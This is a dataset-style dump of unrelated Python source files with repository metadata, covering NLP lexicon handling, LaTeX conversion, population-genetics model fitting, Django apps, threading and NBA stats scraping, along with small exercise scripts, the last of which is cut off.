collection_from_tsv[mwe_template] = semantic_tags
return collection_from_tsv.to_dictionary()
@staticmethod
def escape_mwe(mwe_template: str) -> str:
r'''
Returns the MWE template escaped so that it can be used in a regular
expression.
The difference between this and the normal `re.escape`
method, is that we apply the `re.escape` method to the tokens in the
MWE template and then replace `\*` with `[^\s_]*` so that the wildcards
keep there original meaning with respect to the MWE special syntax rules.
Furthermore, the POS tags in the MWE template replace the `*` with
`[^\s_]*`.
# Parameters
mwe_template : `str`
The MWE template that you want to escape, e.g.
`river_noun bank_noun` or `*_noun boot*_noun`
# Returns
`str`
# Examples
``` python
>>> from pymusas.lexicon_collection import MWELexiconCollection
>>> mwe_escaped = MWELexiconCollection.escape_mwe('ano*_prep carta_noun')
>>> assert r'ano[^\s_]*_prep\ carta_noun' == mwe_escaped
>>> mwe_escaped = MWELexiconCollection.escape_mwe('ano_prep carta_*')
>>> assert r'ano_prep\ carta_[^\s_]*' == mwe_escaped
```
'''
escaped_mwe_template_list: List[str] = []
for token, pos in utils.token_pos_tags_in_lexicon_entry(mwe_template):
escaped_token = re.escape(token).replace(r'\*', r'[^\s_]*')
escaped_pos = pos.replace(r'*', r'[^\s_]*')
escaped_mwe_template_list.append(f'{escaped_token}_{escaped_pos}')
escaped_mwe_template = r'\ '.join(escaped_mwe_template_list)
return escaped_mwe_template
def __setitem__(self, key: str, value: List[str]) -> None:
'''
# Raises
`ValueError`
If using a `pos_mapper` all POS tags within a MWE template cannot
contain any wildcards or the POS tags can only be a wildcard, if
this is not the case a `ValueError` will be raised.
'''
if '{' in key or '}' in key:
warnings.warn('We do not currently support Curly Braces expressions'
' within Multi Word Expression (MWE) lexicons and '
'therefore any MWE template that contains a `{` '
'or `}` will be ignored.')
return None
semantic_tags = value
key_n_gram_length = len(key.split())
mwe_type: LexiconType = LexiconType.MWE_NON_SPECIAL
wildcard_count = 0
if not self.pos_mapper:
if '*' in key:
mwe_type = LexiconType.MWE_WILDCARD
wildcard_count += key.count('*')
if wildcard_count > self.most_wildcards_in_mwe_template:
self.most_wildcards_in_mwe_template = wildcard_count
if key_n_gram_length > self.longest_wildcard_mwe_template:
self.longest_wildcard_mwe_template = key_n_gram_length
key_as_pattern = re.compile(self.escape_mwe(key))
self.mwe_regular_expression_lookup[key_n_gram_length][key[0]][key] = key_as_pattern
else:
if key_n_gram_length > self.longest_non_special_mwe_template:
self.longest_non_special_mwe_template = key_n_gram_length
else:
contains_one_to_many_pos_tag = False
pos_mapped_key_list: List[str] = []
for token, pos in utils.token_pos_tags_in_lexicon_entry(key):
if '*' in pos:
pos_error = ('When using a POS mapper a POS tag within '
'a lexicon entry cannot contain a wildcard'
' unless the POS tag is only a wildcard '
'and no other characters. Leixcon entry '
'and POS tag in that entry that caused '
f'this error: {key} {pos}')
if set(pos.strip()) != set('*'):
raise ValueError(pos_error)
mapped_pos_list = self.pos_mapper.get(pos, [pos])
if len(mapped_pos_list) > 1:
contains_one_to_many_pos_tag = True
mapped_pos = '|'.join(mapped_pos_list)
mapped_pos = '(?:' + mapped_pos + ')'
pos_mapped_key_list.append(f'{token}_{mapped_pos}')
else:
mapped_pos = mapped_pos_list[0]
pos_mapped_key_list.append(f'{token}_{mapped_pos}')
pos_mapped_key = ' '.join(pos_mapped_key_list)
if '*' in pos_mapped_key:
mwe_type = LexiconType.MWE_WILDCARD
wildcard_count += key.count('*')
if wildcard_count > self.most_wildcards_in_mwe_template:
self.most_wildcards_in_mwe_template = wildcard_count
if key_n_gram_length > self.longest_wildcard_mwe_template:
self.longest_wildcard_mwe_template = key_n_gram_length
key_as_pattern = re.compile(self.escape_mwe(pos_mapped_key))
self.pos_mapping_regular_expression_lookup[mwe_type][key_n_gram_length][key[0]][key] = key_as_pattern
elif contains_one_to_many_pos_tag:
key_as_pattern = re.compile(self.escape_mwe(pos_mapped_key))
self.pos_mapping_regular_expression_lookup[mwe_type][key_n_gram_length][key[0]][key] = key_as_pattern
if key_n_gram_length > self.longest_non_special_mwe_template:
self.longest_non_special_mwe_template = key_n_gram_length
else:
self.pos_mapping_lookup[pos_mapped_key] = key
if key_n_gram_length > self.longest_non_special_mwe_template:
self.longest_non_special_mwe_template = key_n_gram_length
self.longest_mwe_template = max(self.longest_non_special_mwe_template,
self.longest_wildcard_mwe_template)
self.meta_data[key] = LexiconMetaData(semantic_tags, key_n_gram_length,
mwe_type, wildcard_count)
def __getitem__(self, key: str) -> LexiconMetaData:
return self.meta_data[key]
def __delitem__(self, key: str) -> None:
def _get_lexicon_statistics() -> Tuple[int, int, int]:
'''
Returns the `longest_non_special_mwe_template`,
`longest_wildcard_mwe_template`, and `most_wildcards_in_mwe_template`
in the `meta_data` as a `Tuple`. This is required as after deleting
an MWE we do not know if it has affected any of these statistics.
# Returns
`Tuple[int, int, int]`
'''
longest_non_special_mwe_template = 0
longest_wildcard_mwe_template = 0
wildcard_count = 0
for value in self.values():
mwe_type = value.lexicon_type
key_n_gram_length = value.n_gram_length
if mwe_type == LexiconType.MWE_NON_SPECIAL:
if key_n_gram_length > longest_non_special_mwe_template:
longest_non_special_mwe_template = key_n_gram_length
elif mwe_type == LexiconType.MWE_WILDCARD:
if key_n_gram_length > longest_wildcard_mwe_template:
longest_wildcard_mwe_template = key_n_gram_length
if value.wildcard_count > wildcard_count:
wildcard_count = value.wildcard_count
return (longest_non_special_mwe_template,
longest_wildcard_mwe_template,
wildcard_count)
lexicon_meta_data = self[key]
del self.meta_data[key]
lexicon_type = lexicon_meta_data.lexicon_type
n_gram_length = lexicon_meta_data.n_gram_length
if self.pos_mapper:
if lexicon_type == LexiconType.MWE_WILDCARD:
del self.pos_mapping_regular_expression_lookup[lexicon_type][n_gram_length][key[0]][key]
if lexicon_type == LexiconType.MWE_NON_SPECIAL:
unique_pos_tags_in_key = utils.unique_pos_tags_in_lexicon_entry(key)
if self.one_to_many_pos_tags.intersection(unique_pos_tags_in_key):
del self.pos_mapping_regular_expression_lookup[lexicon_type][n_gram_length][key[0]][key]
else:
_key_to_delete = ''
for _key, value in self.pos_mapping_lookup.items():
if value == key:
_key_to_delete = _key
if _key_to_delete:
del self.pos_mapping_lookup[_key_to_delete]
else:
if lexicon_type == LexiconType.MWE_WILDCARD:
del self.mwe_regular_expression_lookup[n_gram_length][key[0]][key]
(self.longest_non_special_mwe_template,
self.longest_wildcard_mwe_template,
self.most_wildcards_in_mwe_template) = _get_lexicon_statistics()
self.longest_mwe_template = max(self.longest_non_special_mwe_template,
self.longest_wildcard_mwe_template)
def __len__(self) -> int:
return len(self.meta_data)
def __iter__(self) -> Generator[str, None, None]:
for key in self.meta_data:
yield key
def __str__(self) -> str:
'''
Human readable string.
'''
object_str = f'{self.__class__.__name__}('
for index, item in enumerate(self.items()):
mwe_template = item[0]
meta_data = item[1]
object_str += f"('{mwe_template}': {meta_data}), "
if index == 1:
object_str += '... '
break
object_str += f') ({len(self)} entires in the collection)'
if self.pos_mapper:
object_str += ' (Using a POS Mapper)'
return object_str
def __repr__(self) -> str:
'''
Machine readable string. When printed and run `eval()` over the string
you should be able to recreate the object.
'''
return (f'{self.__class__.__name__}(data={self.to_dictionary()}, '
f'pos_mapper={self.pos_mapper})')
def __eq__(self, other: object) -> bool:
'''
Given another object to compare too it will return `True` if the other
object is the same class and contains the same `meta_data` and
`pos_mapper` instance attributes.
# Parameters
other : `object`
The object to compare too.
# Returns
`True`
'''
if not isinstance(other, MWELexiconCollection):
return False
if len(self) != len(other):
return False
if self.pos_mapper != other.pos_mapper:
return False
if self.meta_data != other.meta_data:
return False
return True
| [
"[email protected]"
] | |
d5d60ae5edaf5a5eb22194b2a9d172139d102b63 | ad0567e70e3c448955b25aa4a6d8e6e30027b7b1 | /scripts/canvastex.py | daf2b04f6d00eb6f03af3a5d6f25677f13d8f9b7 | [
"MIT",
"LicenseRef-scancode-warranty-disclaimer"
] | permissive | dsavransky/grading | 8409f800335296cd15f604c7f5af86cd0c25a31d | 5925cbdcf82b1eed90c927a35c2bc1bf6de13fae | refs/heads/main | 2022-08-12T22:52:34.076808 | 2022-07-22T15:27:15 | 2022-07-22T15:27:15 | 209,359,426 | 8 | 4 | MIT | 2021-10-06T12:57:03 | 2019-09-18T16:50:15 | Python | UTF-8 | Python | false | false | 1,236 | py | #!python
import argparse
import urllib.parse
import re
import os.path
def convlatex(texstr):
""" Convert input latex string to Canvas's img html """
if isinstance(texstr, re.Match):
texstr = texstr.groups()[0]
qtxt = """<img class="equation_image" title="{0}" src="https://canvas.cornell.edu/equation_images/{1}" alt="LaTeX: {0}">""".format(
texstr, urllib.parse.quote(urllib.parse.quote(texstr))
)
return qtxt
def convall(text):
p = re.compile(r"\${1,2}(.*?)\${1,2}")
return p.sub(convlatex, text)
if __name__ == "__main__":
parser = argparse.ArgumentParser(
description="Convert LaTeX input to Canvas-style html."
)
parser.add_argument(
"texstr", nargs=1, type=str, help="LaTeX input or file (string)."
)
parser.add_argument(
"--par",
action="store_true",
help="Treat input as paragraph with embedded LaTeX with $ or $$ delimiters",
)
args = parser.parse_args()
texstr = args.texstr[0]
if os.path.exists(texstr):
with open(texstr, "r") as f:
texstr = f.read()
if args.par:
qtxt = convall(texstr)
else:
qtxt = convlatex(texstr)
print(qtxt)
exit(0)
| [
"[email protected]"
] | |
5588bd437577ce0e40d6e6d5de7128a2ee7fca69 | 925f2935b34042abc9161795413031ae68f45b9a | /multimodel_inference/SC3elsm.py | 859de2c0b23b9b122810c0220fa1cecd7c1363ea | [] | no_license | Farhad63/AFS-analysis-with-moments | 7e1d17f47c06ed97ebb7c9ec8245fe52a88622c3 | 7874b1085073e5f62d910ef2d79a22b29ff3be84 | refs/heads/master | 2022-04-09T22:11:12.341235 | 2020-03-11T21:15:42 | 2020-03-11T21:15:42 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,429 | py | #!/usr/bin/env python
# split, three epochs in each pop, asymmetric migration at same rates in all epochs
# n(para): 11
import matplotlib
matplotlib.use('PDF')
import moments
import pylab
import random
import matplotlib.pyplot as plt
import numpy as np
from numpy import array
from moments import Misc,Spectrum,Numerics,Manips,Integration,Demographics1D,Demographics2D
import sys
infile=sys.argv[1]
pop_ids=[sys.argv[2],sys.argv[3]]
projections=[int(sys.argv[4]),int(sys.argv[5])]
#params=[float(sys.argv[6]),float(sys.argv[7]),float(sys.argv[8]),float(sys.argv[9]),float(sys.argv[10]),float(sys.argv[11])]
params=[1,1,1,1,1,1,1,1,1,1,0.01]
# mutation rate per sequenced portion of genome per generation: for A.millepora, 0.02
mu=float(sys.argv[6])
# generation time, in thousand years: 0.005 (5 years)
gtime=float(sys.argv[7])
dd = Misc.make_data_dict(infile)
# set Polarized=False below for folded AFS analysis
data = Spectrum.from_data_dict(dd, pop_ids,projections,polarized=True)
ns=data.sample_sizes
np.set_printoptions(precision=3)
#-------------------
# split into unequal pop sizes with asymmetrical migration
def sc3ei(params , ns):
# p_misid: proportion of misidentified ancestral states
nu1_1, nu2_1, nu1_2,nu2_2,nu1_3,nu2_3,T1, T2, T3,m, p_misid = params
sts = moments.LinearSystem_1D.steady_state_1D(ns[0] + ns[1])
fs = moments.Spectrum(sts)
fs = moments.Manips.split_1D_to_2D(fs, ns[0], ns[1])
fs.integrate([nu1_1, nu2_1], T1, m = np.array([[0, m], [m, 0]]))
fs.integrate([nu1_2, nu2_2], T2, m = np.array([[0, 0], [0, 0]]))
fs.integrate([nu1_3, nu2_3], T3, m = np.array([[0, m], [m, 0]]))
return (1-p_misid)*fs + p_misid*moments.Numerics.reverse_array(fs)
func=sc3ei
upper_bound = [100, 100, 100,100,100, 100, 100, 100,100, 200,0.25]
lower_bound = [1e-3,1e-3, 1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-3,1e-5,1e-5]
params = moments.Misc.perturb_params(params, fold=2, upper_bound=upper_bound,
lower_bound=lower_bound)
poptg = moments.Inference.optimize_log(params, data, func,
lower_bound=lower_bound,
upper_bound=upper_bound,
verbose=False, maxiter=30)
# extracting model predictions, likelihood and theta
model = func(poptg, ns)
ll_model = moments.Inference.ll_multinom(model, data)
theta = moments.Inference.optimal_sfs_scaling(model, data)
# random index for this replicate
ind=str(random.randint(0,999999))
# plotting demographic model
plot_mod = moments.ModelPlot.generate_model(func, poptg, ns)
moments.ModelPlot.plot_model(plot_mod, save_file="sc3elsm_"+ind+".png", pop_labels=pop_ids, nref=theta/(4*mu), draw_scale=False, gen_time=gtime, gen_time_units="KY", reverse_timeline=True)
# bootstrapping for SDs of params and theta
all_boot=moments.Misc.bootstrap(dd,pop_ids,projections)
uncert=moments.Godambe.GIM_uncert(func,all_boot,poptg,data)
# printing parameters and their SDs
print "RESULT","sc3elsm",ind,len(params),ll_model,sys.argv[1],sys.argv[2],sys.argv[3],poptg,theta,uncert
# plotting quad-panel figure witt AFS, model, residuals:
moments.Plotting.plot_2d_comp_multinom(model, data, vmin=1, resid_range=3,
pop_ids =pop_ids)
plt.savefig("sc3elsm_"+ind+"_"+sys.argv[1]+"_"+sys.argv[2]+"_"+sys.argv[3]+"_"+sys.argv[4]+"_"+sys.argv[5]+'.pdf')
| [
"[email protected]"
] | |
370cd35756182e41352487f83230411fd0926a55 | 7c8fd5af8ade349f1d9f59c40cf9d5cda2755814 | /calculator.py | 80b33d64a550e7940ce55a1ef43fa6d6fb5af57d | [] | no_license | emilydowgialo/calculator-2 | 47cf6c31889ea56847e84b58f8e6c70f4336084f | 393aca0b3018192ecc3db68ff59a183438485e9e | refs/heads/master | 2016-08-11T07:48:06.250197 | 2016-04-07T19:59:55 | 2016-04-07T19:59:55 | 55,652,660 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,431 | py | """
calculator.py
Using our arithmetic.py file from Exercise02, create the
calculator program yourself in this file.
"""
from arithmetic import *
# Your code goes here
def calc_function():
value_returned = False
calculating = True
while calculating == True:
while value_returned == False:
input = raw_input("> ")
tokens = input.split(" ") # parsing user's input by space
token_list = tokens[1:]
# num1 = int(tokens[1]) # converting user input into integer
# if len(tokens) == 2: # accomodates additional parameters
# num2 = int(tokens[2]) # converting user input into integer
# if len(tokens) > 2:
# additional_numbers = int(tokens[1:])
if tokens[0] == "+": # add function
print add(token_list) # calling the add function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "-": # subtract function
print subtract(num1, num2) # calling the subtr function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "*": # multiply function
print multiply(num1, num2) # calling the multiply function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "/": # divide function
print divide(num1, num2) # calling the divide function from arithmetic.py module
value_returned = True # breaking the loop
if tokens[0] == "square":
print square(num1)
value_returned = True
if tokens[0] == "cube":
print cube(num1)
value_returned = True
if tokens[0] == "pow":
print power(num1, num2)
value_returned = True
if tokens[0] == "mod":
print mod(num1, num2)
value_returned = True
continue_playing = raw_input("Would you like to continue calculating? Type 1 for yes and type 2 for no: ")
if continue_playing == "1":
value_returned = False
elif continue_playing == "2":
calculating = False
print "goodbye"
else:
print "Error: you did not type 1 or 2!"
calc_function()
| [
"[email protected]"
] | |
89b03a17f56e9843db582338bc395c1f2fea79cf | 9724c8cd81ad39f7f9a2419e2873d7d74cb10c72 | /pyabc/util/dict2arr.py | 1e205cc289c9abf58cf89c4e2a29997249c9bcd2 | [
"BSD-3-Clause"
] | permissive | ICB-DCM/pyABC | 36b7fc431fe4ba4b34d80d268603ec410aeaf918 | d1542fb201edca86369082e1fc7934995e3d03a4 | refs/heads/main | 2023-09-01T13:42:52.880878 | 2023-08-18T16:55:04 | 2023-08-18T16:55:04 | 96,995,608 | 187 | 49 | BSD-3-Clause | 2023-08-18T16:55:05 | 2017-07-12T10:30:10 | Python | UTF-8 | Python | false | false | 2,995 | py | """Transform dictionaries to arrays."""
from numbers import Number
from typing import List, Union
import numpy as np
import pandas as pd
def dict2arr(dct: Union[dict, np.ndarray], keys: List) -> np.ndarray:
"""Convert dictionary to 1d array, in specified key order.
Parameters
----------
dct: If dict-similar, values of all keys are extracted into a 1d array.
Entries can be data frames, ndarrays, or single numbers.
keys: Keys of interest, also defines the order.
Returns
-------
arr: 1d array of all concatenated values.
"""
if isinstance(dct, np.ndarray):
return dct
arr = []
for key in keys:
val = dct[key]
if isinstance(val, (pd.DataFrame, pd.Series)):
arr.append(val.to_numpy().flatten())
elif isinstance(val, np.ndarray):
arr.append(val.flatten())
elif isinstance(val, Number):
arr.append([val])
else:
raise TypeError(
f"Cannot parse variable {key}={val} of type {type(val)} "
"to numeric."
)
# for efficiency, directly parse single entries
if len(arr) == 1:
return np.asarray(arr[0])
# flatten
arr = [val for sub_arr in arr for val in sub_arr]
return np.asarray(arr)
def dict2arrlabels(dct: dict, keys: List) -> List[str]:
"""Get label array consistent with the output of `dict2arr`.
Can be called e.g. once on the observed data and used for logging.
Parameters
----------
dct: Model output or observed data.
keys: Keys of interest, also defines the order.
Returns
-------
labels: List of labels consistent with the output of `dict2arr`.
"""
labels = []
for key in keys:
val = dct[key]
if isinstance(val, (pd.DataFrame, pd.Series)):
# default flattening mode is 'C', i.e. row-major, i.e. row-by-row
for row in range(len(val.index)):
for col in val.columns:
labels.append(f"{key}:{col}:{row}")
elif isinstance(val, np.ndarray):
# array can have any dimension, thus just flat indices
for ix in range(val.size):
labels.append(f"{key}:{ix}")
elif isinstance(val, Number):
labels.append(key)
else:
raise TypeError(
f"Cannot parse variable {key}={val} of type {type(val)} "
"to numeric."
)
return labels
def io_dict2arr(fun):
"""Wrapper parsing inputs dicts to ndarrays.
Assumes the array is the first argument, and `self` holds a `keys`
variable.
"""
def wrapped_fun(self, data: Union[dict, np.ndarray], *args, **kwargs):
# convert input to array
data = dict2arr(data, self.x_keys)
# call the actual function
ret: np.ndarray = fun(self, data, *args, **kwargs)
# flatten output
return ret.flatten()
return wrapped_fun
| [
"[email protected]"
] | |
0e88de598b1ad3a47bce2fd27367d2c995ed185d | 487ce91881032c1de16e35ed8bc187d6034205f7 | /codes/CodeJamCrawler/16_0_2_neat/16_0_2_mck_B.py | 357542136cb2949d40fc809ea50ad4ecaec00794 | [] | no_license | DaHuO/Supergraph | 9cd26d8c5a081803015d93cf5f2674009e92ef7e | c88059dc66297af577ad2b8afa4e0ac0ad622915 | refs/heads/master | 2021-06-14T16:07:52.405091 | 2016-08-21T13:39:13 | 2016-08-21T13:39:13 | 49,829,508 | 2 | 0 | null | 2021-03-19T21:55:46 | 2016-01-17T18:23:00 | Python | UTF-8 | Python | false | false | 576 | py | import sys
def flip(x, list):
for i in range(0, x + 1):
if list[i] == "-":
list[i] = "+"
else:
list[i] = "-"
return list
def getLastIndexOfN(list):
for i in range(len(list), 0, -1):
if list[i - 1] == "-":
return i - 1
return -1
if __name__ == "__main__":
tests = int(sys.stdin.readline())
for test in range(1, tests + 1):
s = sys.stdin.readline().replace("\n", "")
s = [i for i in s]
ans = 0
while "-" in s:
ans += 1
s = flip(getLastIndexOfN(s), s)
print ("Case #" + str(test) + ": " + str(ans))
| [
"[[email protected]]"
] | |
aea17cef7dbd0f04529c1d5463ea0f6bfcb948fc | af9268e1ead8cdb491868c14a2240d9e44fb3b56 | /Cousinade/polls/migrations/0001_initial.py | 6363a01cf03b7608b2f3dd7940be9dd6cb4cd7dd | [] | no_license | frosqh/Cousinade2017 | d5154c24c93ca8089eeba26b53c594e92cb6bd82 | c34d5707af02402bf2bb7405eddc91297da399ff | refs/heads/master | 2021-01-20T07:57:34.586476 | 2017-10-22T18:42:45 | 2017-10-22T18:42:45 | 90,074,802 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,053 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2017-10-15 23:15
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
import polls.models
class Migration(migrations.Migration):
initial = True
dependencies = [
]
operations = [
migrations.CreateModel(
name='Author',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('authorName', models.CharField(default='anonymous', max_length=200)),
],
),
migrations.CreateModel(
name='Photos',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('photo', models.ImageField(upload_to=polls.models.user_directory_path)),
('author', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='polls.Author')),
],
),
]
| [
"[email protected]"
] | |
17d3ff2a36f1adcf56dde4f95f0754a323175ca0 | eb736f1412e434522687190685ccdae9ba722b58 | /Lab Exercise 2.3.2021/Cars/cars2.py | 2f49598a60b1672ee3390830cbfe517e22323420 | [] | no_license | nmessa/C_Sharp-2021 | 4a008853f4cf9fa8a617a5fcadaad964fc30c84c | 1124d4ab106a6a2204b98019b36f495f4167a12b | refs/heads/main | 2023-06-05T15:35:13.734371 | 2021-06-15T12:43:02 | 2021-06-15T12:43:02 | 332,059,776 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 961 | py | #Closest approach of 2 cars
##Car1 traveling north currently 2 miles south of junction at a rate of 30 MPH
##Car2 traveling west currently 3 miles east of jucntion at a rate of 40 MPH
##Find the closest distance the two cars approach
from math import *
from pylab import *
import time
collisions = []
for speed1 in range(1, 50):
for speed2 in range(1,50):
times = []
distances = []
t = 0
while True:
car1 = 2 - speed1/3600 * t
car2 = 3 - speed2/3600 * t
distance = sqrt(car1**2 + car2**2)
if car1 < 0 and car2 < 0:
break
distances.append(distance)
times.append(t)
t += 1
if distance < 0.01:
collisions.append((speed1, speed2))
## plot(times, distances)
## grid(True)
## show()
print(collisions)
##Solution
##0.2 miles at time 259 seconds
| [
"[email protected]"
] | |
35b87aaf0cdcfdb706a1d081dce7b88de2b2f8a8 | 2ea4e667bdcd82565fca8ac96f74ee08bd67364e | /backend/chat/models.py | a2d82fbe6251955d52dea8721a5990fc822a0ba3 | [] | no_license | crowdbotics-apps/wadduplyapp-24147 | 39dff74efbdb15feaf1bde54dd9f6679b9c786ed | 19436f48d03dcc22807e9e331bb371a546f1dc9d | refs/heads/master | 2023-02-23T23:24:25.213934 | 2021-01-29T21:09:30 | 2021-01-29T21:09:30 | 334,259,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,152 | py | from django.conf import settings
from django.db import models
class ThreadAction(models.Model):
"Generated Model"
action = models.CharField(
max_length=7,
)
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="threadaction_thread",
)
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="threadaction_profile",
)
timestamp_action = models.DateTimeField(
auto_now_add=True,
)
class ForwardedMessage(models.Model):
"Generated Model"
message = models.ForeignKey(
"chat.Message",
on_delete=models.CASCADE,
related_name="forwardedmessage_message",
)
forwarded_by = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="forwardedmessage_forwarded_by",
)
forwarded_to = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="forwardedmessage_forwarded_to",
)
timestamp_forwarded = models.DateTimeField(
auto_now_add=True,
)
class MessageAction(models.Model):
"Generated Model"
action = models.CharField(
max_length=7,
)
message = models.ForeignKey(
"chat.Message",
on_delete=models.CASCADE,
related_name="messageaction_message",
)
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="messageaction_profile",
)
timestamp_action = models.DateTimeField(
auto_now_add=True,
)
class Message(models.Model):
"Generated Model"
message = models.TextField()
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="message_thread",
)
sent_by = models.ForeignKey(
"chat.ThreadMember",
on_delete=models.CASCADE,
related_name="message_sent_by",
)
attachment = models.URLField()
is_draft = models.BooleanField()
is_delivered = models.BooleanField()
is_read = models.BooleanField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
timestamp_delivered = models.DateTimeField()
timestamp_read = models.DateTimeField()
class Thread(models.Model):
"Generated Model"
name = models.CharField(
max_length=255,
)
thread_photo = models.URLField()
timestamp_created = models.DateTimeField(
auto_now_add=True,
)
class ThreadMember(models.Model):
"Generated Model"
profile = models.ForeignKey(
"chat_user_profile.Profile",
on_delete=models.CASCADE,
related_name="threadmember_profile",
)
thread = models.ForeignKey(
"chat.Thread",
on_delete=models.CASCADE,
related_name="threadmember_thread",
)
is_admin = models.BooleanField()
timestamp_joined = models.DateTimeField(
auto_now_add=True,
)
timestamp_left = models.DateTimeField()
last_rejoined = models.DateTimeField()
# Create your models here.
| [
"[email protected]"
] | |
c72650b3a9bf00b1efe3f5361b5d09a436c259cc | 48390374bb000e593a192ba5981210b130ebff1e | /using_threads/t3_locks.py | 3587dac6018618c0cf77b26f789f228f06185810 | [] | no_license | onionmccabbage/beyondAdvancedPythonApril2021 | 396615bb3c1989e0e57ae818950135250ce9ea33 | 0abccebcff1d0ff2e05f1f3b0188763fa3929920 | refs/heads/main | 2023-06-01T22:47:49.855370 | 2021-06-16T12:12:29 | 2021-06-16T12:12:29 | 360,176,678 | 0 | 1 | null | null | null | null | UTF-8 | Python | false | false | 998 | py | import threading
import time
import random
counter = 1
lock = threading.Lock()
def workerA():
global counter
lock.acquire()
try:
while counter <100:
counter += 1
print( 'Worker A is incrementing counter to {}'.format(counter) )
except Exception as e:
print(e)
finally:
lock.release()
def workerB():
global counter
lock.acquire()
try:
while counter >-100:
counter -= 1
print( 'Worker B is decrementing counter to {}'.format(counter) )
except Exception as e:
print(e)
finally:
lock.release()
def main():
t0 = time.time()
thread1 = threading.Thread( target=workerA )
thread2 = threading.Thread( target=workerB )
thread1.start()
thread2.start()
thread1.join()
thread2.join()
t1 = time.time()
print('Execution took {} seconds'.format(t1-t0))
if __name__ == '__main__':
main() | [
"[email protected]"
] | |
2d7f069d13b7e23eb16fe01d25ac2cbd1a0d3e43 | 9714a7e31c922dea5187ef09de7c7095bda515e1 | /visualization/api/ShotsDash.py | 5c65ee274340933206fb8e4127309f18d9abfc70 | [] | no_license | rd11490/Russell | 5104c846bccc52b2456dadb0e3a85af22169006f | b1f2c4c96a04a492bc5d1a0596f9bbc40a696e9d | refs/heads/master | 2022-07-11T03:51:29.155850 | 2019-12-31T05:21:58 | 2019-12-31T05:21:58 | 104,696,236 | 5 | 1 | null | 2022-06-20T23:50:29 | 2017-09-25T02:50:00 | Scala | UTF-8 | Python | false | false | 1,585 | py | import json
import pandas as pd
import urllib3
players = [1628369, 1627759,202954,202681,1626179,202694,202330,1628464,1627824,203935,1628400,201143,203382]
def build_ulr(player):
return "https://stats.nba.com/stats/playerdashptshots?DateFrom=&DateTo=&GameSegment=&LastNGames=0&LeagueID=00&Location=&Month=0&OpponentTeamID=0&Outcome=&PerMode=Totals&Period=0&PlayerID={0}&Season=2018-19&SeasonSegment=&SeasonType=Regular+Season&TeamID=0&VsConference=&VsDivision=".format(player)
header_data = {
'Host': 'stats.nba.com',
'Connection': 'keep-alive',
'Cache-Control': 'max-age=0',
'Upgrade-Insecure-Requests': '1',
'User-Agent': 'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/66.0.3359.181 Safari/537.36',
'Referer': 'stats.nba.com',
'Accept-Encoding': 'gzip, deflate, br',
'Accept-Language': 'en-US,en;q=0.9',
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
}
http = urllib3.PoolManager()
def extract_data(url, player):
print(url)
r = http.request('GET', url, headers=header_data)
resp = json.loads(r.data)
results = resp['resultSets'][4]
headers = results['headers']
headers.append("player")
rows = results['rowSet']
frame = pd.DataFrame(rows)
frame["player"] = player
frame.columns = headers
return frame
frames = []
for player in players:
url = build_ulr(player)
data = extract_data(url, player)
frames.append(data)
out = pd.concat(frames)
out.to_csv("CsDefenderDist.csv")
| [
"[email protected]"
] | |
26c794fa0e7c4d0f5ce7dd1b14ec5667ae7562db | e38692437085a48abba0d682ec9921e7c24bf122 | /source/webapp/admin.py | db2c1391a590d746ca795f1daf03d514497964ea | [] | no_license | Aitmatow/farids_blog | f7a9e57c18957a1a08b66aff349904ad3b948cbc | cc92853ea8e2ac362df8bee4740d98280e7aefed | refs/heads/master | 2023-04-27T23:07:51.848466 | 2019-10-22T12:58:23 | 2019-10-22T12:58:23 | 215,323,364 | 0 | 0 | null | 2023-04-21T20:38:49 | 2019-10-15T14:44:35 | Python | UTF-8 | Python | false | false | 678 | py | from django.contrib import admin
from webapp.models import Article, Comment, Category, Tag
class CommentAdmin(admin.TabularInline):
model = Comment
fields = ['author', 'text']
extra = 0
class ArticleAdmin(admin.ModelAdmin):
list_display = ['pk', 'title', 'author', 'created_at']
list_filter = ['author', 'category']
list_display_links = ['pk', 'title']
search_fields = ['title', 'text']
exclude = []
filter_horizontal = ['tags']
readonly_fields = ['created_at', 'updated_at']
inlines = [CommentAdmin]
admin.site.register(Article, ArticleAdmin)
admin.site.register(Comment)
admin.site.register(Category)
admin.site.register(Tag)
| [
"[email protected]"
] | |
d2ff3964c849c9dfa4f125ea4f263ed8cc60c79e | 68e76ef27df38b0fe2c1c993a9c15896563f950d | /2 Практика Робот/robot-tasks-master/task_32.py | a6c5bd5d73d6bf5f60c3579c8d427f1c5c882714 | [] | no_license | Jumas-Cola/mipt_cs_on_python3_answers | 72e9341656daa4afa35f8d39de917eb5471ee132 | a2d128c4ce391bdeea6d20eb955855ad5bc5a0b4 | refs/heads/master | 2020-03-27T23:44:09.088994 | 2019-07-29T13:55:35 | 2019-07-29T13:55:35 | 147,341,552 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 451 | py | #!/usr/bin/python3
from pyrob.api import *
@task(delay=0.01)
def task_8_18():
x=0
while not (wall_is_on_the_right() and not wall_is_on_the_left()):
if not wall_is_above() and wall_is_beneath():
while not wall_is_above():
